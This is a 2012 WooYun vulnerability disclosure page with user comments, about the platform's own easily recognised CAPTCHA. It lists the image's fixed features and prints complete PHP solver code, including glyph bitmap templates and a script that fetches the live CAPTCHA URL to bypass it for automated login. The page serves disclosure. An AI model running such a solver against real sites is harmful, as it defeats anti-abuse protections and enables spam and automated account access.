当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(16) 关注此漏洞

缺陷编号: WooYun-2012-12722

漏洞标题: 乌云官方验证码容易识别的bug

相关厂商: 乌云官方

漏洞作者: l4yn3

提交时间: 2012-09-25 19:31

公开时间: 2012-11-09 19:31

漏洞类型: 设计缺陷/逻辑错误

危害等级: 中

自评Rank: 6

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

2人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-09-25: 细节已通知厂商并且等待厂商处理中
2012-09-25: 厂商已经确认,细节仅向厂商公开
2012-10-05: 细节向核心白帽子及相关领域专家公开
2012-10-15: 细节向普通白帽子公开
2012-10-25: 细节向实习白帽子公开
2012-11-09: 细节向公众公开

简要描述:

乌云官方网站验证码过于简单,用很简单的程序就可以识别出来

详细说明:

乌云官方网站验证码过于简单,用很简单的程序就可以识别出来,然后应该可以绕过验证码进行灌水,我只测试了绕过验证码自动登录。



特征:

1.四个字符,

2.基本无干扰素。

3.字符的rgb特征分别为(255,255,255)或(0, 0, 0),根据此特征可识别字符。

4.共涉及字母和数字22个,貌似没有0和O,1和I,可能是怕分不清楚。

5.字符间距各1个像素,很固定。

6.字符宽度8像素,高度10像素,很固定。

7.图片上间距和左间距固定,各为4px和14px,固定不变。



识别思路:

1.二值化,根据字符的rgb特征分别为(255,255,255)或(0, 0, 0)的特征将字符像素变成1,其他为0.

2.取字模,手机22个验证码字符的二进制字模。

3.和乌云验证码对比,识别验证码。

code 区域
<?php


/*=============================================================================


#     FileName: get_word_from_imge.php


#         Desc: 简单的验证码识别程序


#       Author: l4yn3


#     HomePage: http://hi.baidu.com/l4yn3/


#      Version: 0.0.1


#   LastChange: 2012-09-25 18:46:32


#     参考知识: http://blog.csdn.net/ugg/article/details/3953137


=============================================================================*/





define('WORD_WIDTH',8);   //字符宽度


define('WORD_HIGHT',10);  //字符高度


define('WORD_SPACING',1);  //字符间距








/**


 * 乌云官方验证码识别类


 */





class valite


{


	var $data;


	var $Keys;


	var $ImagePath;


	public function setImage($image)


	{


		$this->ImagePath = $image;


	}


	


	public function getHec()


	{


		global $sign;


		$num = ($sign == "black") ? 0 : 255 * 3;


		$res = imagecreatefrompng($this->ImagePath);


		$size = getimagesize($this->ImagePath);


		$data = array();


		for($i = 0; $i < $size[1]; ++$i)


		{


			for($j=0; $j < $size[0]; ++$j)


			{


				$rgb = imagecolorat($res,$j,$i);


				$rgbarray = imagecolorsforindex($res, $rgb);


				if($rgbarray['red'] + $rgbarray['green'] + $rgbarray['blue'] !== $num)


				{


					$data[$i][$j] = 0;


				}


				else


				{


					$data[$i][$j] = 1;


				}


			}


		}


		$this->DataArray = $data;


		$this->ImageSize = $size;


	}


	


	public function run()


	{


		global $offset_x, $offset_y, $sign;


		$num = ($sign == "black") ? 0 : 255 * 3;   //判断是黑色文字还是白色文字


		$result="";


		$data = array("","","","");


		$res = imagecreatefrompng($this->ImagePath);


		$size = getimagesize($this->ImagePath);


		


		for($a = 1; $a <= 4; $a++)


		{


			$str = '';


			for($i = $offset_y; $i < $offset_y + WORD_HIGHT; $i++)


			{


				for($j = $offset_x + ($a - 1) * WORD_WIDTH + ($a - 1) * WORD_SPACING; $j < $offset_x + WORD_WIDTH * $a + ($a - 1) * WORD_SPACING; $j++)


				{


					$rgb = imagecolorat($res, $j, $i);


					$rgb_arr = imagecolorsforindex($res, $rgb);


					$data[$a-1] .= $this->DataArray[$i][$j];


				}


			}


		}


		


		// 进行关键字匹配


		foreach($data as $numKey => $numString)


		{


			$max = 0.0;


			$num = 0;


			foreach($this->Keys as $key => $value)


			{


				$percent = 0.0;


				similar_text($value, $numString,$percent);  //判断字符的相似度


				if(intval($percent) > $max)


				{


					$max = $percent;


					$num = $key;


					if(intval($percent) == 100)


					break;


				}


			}


			$result.=$num;


		}


		$this->data = $result;


		return $result;


	}


	public function __construct()


	{


		/*识别出来的乌云验证码字模信息*/


		$this->Keys = array(


		'0'=>'',


		'1'=>'',


		'2'=>'00111100011001101100001100000011000001100000110000011000001100000110000011111111',


		'3'=>'01111100110001100000001100000110000111000000011000000011000000111100011001111100',


		'4'=>'00000110000011100001111000110110011001101100011011111111000001100000011000000110',


		'5'=>'11111110110000001100000011011100111001100000001100000011110000110110011000111100',


		'6'=>'00111100011001101100001011000000110111001110011011000011110000110110011000111100',


		'7'=>'11111111000000110000001100000110000011000001100000110000011000001100000011000000',


		'8'=>'00111100011001101100001101100110001111000110011011000011110000110110011000111100',


		'9'=>'00111100011001101100001111000011011001110011101100000011010000110110011000111100',


		'A'=>'00011000001111000110011011000011110000111100001111111111110000111100001111000011',


		'B'=>'11111100110001101100001111000110111111001100011011000011110000111100011011111100',


		'C'=>'00111110011000111100000111000000110000001100000011000000110000010110001100111110',


		'D'=>'11111100110001101100001111000011110000111100001111000011110000111100011011111100',


		'E'=>'11111110110000001100000011000000111111001100000011000000110000001100000011111110',


		'F'=>'11111111110000001100000011000000111111001100000011000000110000001100000011000000',


		'G'=>'00111110011000111100000011000000110000001100011111000011110000110110001100111110',


		'H'=>'11000011110000111100001111000011111111111100001111000011110000111100001111000011',


		'I'=>'',


		'J'=>'00011110000001100000011000000110000001100000011000000110010001100110110000111000',


		'K'=>'11000011110001101100110011011000111100001111000011011000110011001100011011000011',


		'L'=>'11000000110000001100000011000000110000001100000011000000110000001100000011111110',


		'M'=>'11000011111001111111111111011011110110111101101111000011110000111100001111000011',


		'N'=>'11000011111000111111001111110011110110111101101111001111110001111100011111000011',


		'O'=>'',


		'P'=>'11111110110000111100001111000011111111101100000011000000110000001100000011000000',


		'Q'=>'00111100011001101100001111000011110000111100001111011011110011110110011000111101',


		'R'=>'11111110110000111100001111000011111111101111100011001100110001101100001111000011',


		'S'=>'01111110110000111100000011000000011111100000001100000011000000111100001101111110',


		'T'=>'11111111000110000001100000011000000110000001100000011000000110000001100000011000',


		'U'=>'11000011110000111100001111000011110000111100001111000011110000110110011000111100',


		'V'=>'11000011110000111100001101100110011001100110011000111100001111000001100000011000',


		'W'=>'11000011110000111100001111000011110110111101101111011011111111111110011111000011',


		'X'=>'11000011110000110110011000111100000110000001100000111100011001101100001111000011',


		'Y'=>'11000011110000110110011000111100000110000001100000011000000110000001100000011000',


		'Z'=>'11111110000001100000011000001100000110000011000001100000110000001100000011111110',


	);


	}


}





/**


 *


 * 此函数用于获得字符特征值,即获取验证码的特征值


 */


function getOffSetX($img)


{


	global $offset_x, $offset_y, $sign;


	$res = imagecreatefrompng($img);


	$size = getimagesize($img);


	for($a = 1; $a <= 4; $a++)


	{


		$str = '';


		for($i = $offset_y; $i < $offset_y + WORD_HIGHT; $i++)


		{


			for($j = $offset_x + ($a - 1) * WORD_WIDTH + ($a - 1) * WORD_SPACING; $j < $offset_x + WORD_WIDTH * $a + ($a - 1) * WORD_SPACING; $j++)


			{


				$rgb = imagecolorat($res, $j, $i);


				$rgb_arr = imagecolorsforindex($res, $rgb);


				$num = ($sign == "black") ? 0 : 255 * 3;


				if($rgb_arr['red'] + $rgb_arr['green'] + $rgb_arr['blue'] != $num)


				{


					$str .= '0';	


				}


				else


				{


					$str .= '1';


				}


			}


		}


		return $str;


	}


	return $str;


}





/**


 * 判断是黑色文字 还是白色文字 乌云两种颜色验证码,黑字和白字


 */


function checkBOrW($img)


{


	$res = imagecreatefrompng($img);


	$size = getimagesize($img);


	$str = "";


	for($i = 0; $i < $size[1]; $i++)


	{


		for($j = 0; $j < $size[0]; $j++)


		{


			$rgb = imagecolorat($res, $j, $i);


			$rgb_arr = imagecolorsforindex($res, $rgb);


			$str .= $rgb_arr["green"].$rgb_arr["red"].$rgb_arr["blue"];


		}


	}


	if(preg_match("/(255){3}/", $str))


	{


		return "white";  //白色文字


	}


	else


	{


		return 'black';  //黑色文字


	}


}





/**


 * 获取offset_x和offset_y


 */


function getOffSet($img = '')


{


	global $sign;


	$num = ($sign == "black") ? 0 : 255 * 3;   //判断是黑色文字还是白色文字


	$res = imagecreatefrompng($img);


	$size = getimagesize($img);


	$offset_x = '';


	$offset_y = '';


	for($i = 1; $i < $size[0]; $i++)


	{


		for($j = 1; $j < $size[1]; $j++)


		{


			$rgb = imagecolorat($res, $i, $j);


			$rgb_arr = imagecolorsforindex($res, $rgb);


			if($rgb_arr['red'] + $rgb_arr['green'] + $rgb_arr['blue'] == $num)


			{


				$offset_x = $i;


				break;


			}


		}


		if($offset_x)


		{


			break;


		}


	}


	for($i = 1; $i < $size[1]; $i++)


	{


		for($j = 1; $j < $size[0]; $j++)


		{


			$rgb = imagecolorat($res, $j, $i);


			$rgb_arr = imagecolorsforindex($res, $rgb);


			if($rgb_arr['red'] + $rgb_arr['green'] + $rgb_arr['blue'] == $num)


			{


				$offset_y = $i;


				break;


			}


		}


		if($offset_y)


		{


			break;


		}


	}


	return array('offset_x'=>$offset_x, 'offset_y'=>$offset_y);


}



code 区域
<?php


include("get_word_from_imge.php");





$img = "http://www.wooyun.org/captcha.php";   //验证码图片名称





$content = get_remove_content($img);


file_put_contents("hi.png", $content);





$img = "hi.png";





$sign = checkBOrW($img);


$offset_arr = getOffSet($img);print_r($offset_arr);exit;


extract($offset_arr);


//getOffSetX($img);  //获取特征值





$valite = new valite();


$valite->setImage($img);


$valite->getHec();


$result = $valite->run();


echo $result;

漏洞证明:



修复方案:

使验证码不规则化,增加更复杂的干扰素,减少可识别固定特征(比如字符间距,文字距离图片间距)。其他各种干扰方式。

版权声明:转载请注明来源 l4yn3@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2012-09-25 19:32

厂商回复:

非常感谢作者详细的提交,内容非常丰富,但是这个问题我们认为我们可能不会修复 :)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2012-09-25 19:33 | 风萧萧 认证白帽子 ( 普通白帽子 | Rank:1068 漏洞数:80 | 人这一辈子总要动真格的爱上什么人)
    0

    又来了。。。

    1# 回复此人
  2. 2012-09-25 19:39 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    1

    月经洞

    2# 回复此人
  3. 2012-09-25 20:55 | l4yn3 ( 路人 | Rank:15 漏洞数:3 | PHPER)
    0

    哈,环境不同,问题的重要性不同。理解。

    3# 回复此人
  4. 2012-09-26 16:10 | 凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)
    0

    @l4yn3 求识别程序哈

    4# 回复此人
  5. 2012-09-26 16:12 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @l4yn3 +1

    5# 回复此人
  6. 2012-10-05 19:51 | 风萧萧 认证白帽子 ( 普通白帽子 | Rank:1068 漏洞数:80 | 人这一辈子总要动真格的爱上什么人)
    0

    很赞

    6# 回复此人
  7. 2012-10-16 08:35 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)
    0

    终于看到你了,哈哈

    7# 回复此人
  8. 2012-10-26 10:08 | Breaker ( 路人 | Rank:12 漏洞数:1 | NSFOCUS)
    0

    为什么不修复呀?

    8# 回复此人
  9. 2012-11-09 20:15 | 苦逼老爷爷 ( 普通白帽子 | Rank:211 漏洞数:17 | 用户太懒什么都没留下)
    0

    最恨那些神人共愤的验证码,叫上几个人来一起研究半天错上n次后才能蒙对一次。 这用户体验,不提了。

    9# 回复此人
  10. 2012-11-10 15:19 | feixiang ( 路人 | Rank:0 漏洞数:1 | = = !性别男,爱好女,有理想,没技术。)
    0

    @Breaker wooyun采用邀请制度,所以谁敢用ID灌水试试。。。灌水一个封一个。

    10# 回复此人
  11. 2012-11-11 08:27 | Breaker ( 路人 | Rank:12 漏洞数:1 | NSFOCUS)
    0

    @feixiang 好吧....

    11# 回复此人
  12. 2012-11-11 17:26 | l4yn3 ( 路人 | Rank:15 漏洞数:3 | PHPER)
    0

    @feixiang 首先问题算不算问题不应该由客观条件决定,而且貌似提交漏洞不需要是乌云会员吧,这个点能不能灌各位可以试试。

    12# 回复此人

登录后才能发表评论,请先 登录